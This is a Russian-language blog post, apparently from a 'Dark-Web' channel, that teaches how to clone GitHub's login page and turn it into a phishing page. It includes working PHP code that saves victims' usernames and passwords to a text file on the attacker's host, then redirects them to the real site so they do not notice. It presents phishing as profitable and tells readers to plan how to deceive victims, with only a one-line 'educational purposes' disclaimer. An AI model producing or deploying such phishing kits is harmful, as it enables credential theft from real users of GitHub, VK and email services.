Найти в Дзене
Dark-Web
18 подписчиков

Как создать фишинг страницу за пару минут?

552
1 мин
Всем привет, мои друзья! В этой статье я хочу вам рассказать о том, как можно создай фишинг из любого сайта. Кто не знает, фишинг это клон какой-то страницы с авторизацией, например гитхаб, вк или почты. Погнали!
Теория об фишинге
Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инженерия.
Приступим к первому этапу
Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github .com/login
Для РИПа (клонирования) будем использовать сервис - WebParse
Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:
После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:
Второй этап
Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параме

Всем привет, мои друзья! В этой статье я хочу вам рассказать о том, как можно создай фишинг из любого сайта. Кто не знает, фишинг это клон какой-то страницы с авторизацией, например гитхаб, вк или почты. Погнали!

  • Я никого ни к чему не призываю, статья написана в ознакомительных целях!

Теория об фишинге

Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фейковый сайт и ввели свои данные. Социальная инженерия.

Приступим к первому этапу

Итак, для начала ищем авторизацию на нужном нам сайте, я буду приводить в пример гитхаб, получается вот эта ссылка - https://github .com/login

Для РИПа (клонирования) будем использовать сервис - WebParse

Регистрируем временную почту Temp Mail далее регистрируемся на WebParse, и в поле для домена копируем нужную страницу:

После клонирования вам на почту придёт письмо с ссылкой на архив со страницей:

Второй этап

Скачали, распаковали. Теперь нам нужно реализовать сохранение введённых паролей. За это отвечает параметр action, нам нужно его изменить:

Меняем его на auth.php

На скрине параметр уже изменён.

Теперь в папке с html файлом создаём auth.php и папку base:

Открываем auth.php в текстовом редакторе (я юзаю NotePad++.) и добавляем следующий код:

<?php
file_put_contents('base/ds_logs.txt', "Username: ".$_POST['login']." Password: ".$_POST['password'].'\n', FILE_APPEND);
?>

file_put_contents функция для записи данных в файл, base/ds_logs.txt - путь к файлу, где сохранятся пароли, FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

Теперь загружаем всё это дело на хостинг, а папке base даём права 777

Переходим на сайт и вводим данные, они сохранятся по ссылке: вашдомен .com/base/ds_logs.txt

  • Название папки и имя .txt файла можно поменять в auth.php

Пароли сохраняются, но после попытки авторизоваться ничего не происходит, поэтому добавим в auth.php следующее:

header('Location: https://github .com/session');

После ввода логина и пароля, жертва переместится по ссылке github .com/session тем временем у нас:

На этом статья подходит к концу, для полноты картины можно было сверстать простую админку с авторизацией, блэкджеком и сами знаете кем.

2
Кибербезопасность
25,6 тыс интересуются